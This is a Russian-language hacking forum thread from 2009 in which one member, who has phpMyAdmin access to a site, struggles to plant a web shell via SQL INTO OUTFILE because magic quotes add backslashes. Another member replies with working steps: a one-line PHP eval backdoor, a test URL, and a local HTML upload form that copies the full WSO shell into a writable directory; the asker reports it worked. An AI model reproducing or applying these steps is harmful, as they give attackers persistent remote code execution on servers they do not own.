HOME    FORUMS    MEMBBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9591  
Старый 25.10.2009, 17:06
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
 

  #9592  
Старый 25.10.2009, 17:08
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от M1ks  
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
что экранируется? Ты хотя бы <?phpinfo();?> можешь залить? Будет показываться phpinfo() ?
 

  #9593  
Старый 25.10.2009, 17:10
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Цитата:
Сообщение от M1ks  
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
омг, что значит работает, но екранизируется?
что экранизируеться?
излагай проблему подробно, дабы тебе смогли помочь.
 

  #9594  
Старый 25.10.2009, 17:11
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
 

  #9595  
Старый 25.10.2009, 17:12
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о

Или то, что записывается - просто глюк.
 

  #9596  
Старый 25.10.2009, 17:13
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
 

  #9597  
Старый 25.10.2009, 17:15
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от M1ks  
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.
 

  #9598  
Старый 25.10.2009, 17:16
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от M1ks  
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
тогда лей wso без html-вставок, последняя версия:

https://forum.antichat.ru/threadedpost1624918.html#post1624918

1. Заливаешь такой шелл:

<?eval(stripslashes($_GET[e]));?>

2. Проверяешь:

Код:
http://site.com/имя_твоего_шелла&e=phpinfo();
или

Код:
http://site.com/имя_твоего_шелла?e=phpinfo();
по разному бывает

3. У себя на компе такую локальную форму творишь (обзываешь .html):

Код:
<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
 method=post enctype=multipart/form-data>
<input type=file name=file><br> 
<input type=submit value=Загрузить><br>
</form>
4. Запускаешь и льешь wso, всё

Последний раз редактировалось Pashkela; 25.10.2009 в 17:19..
 

  #9599  
Старый 25.10.2009, 17:18
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'
 

  #9600  
Старый 25.10.2009, 17:25
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

Pashkela.
Спасибо, получилось
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ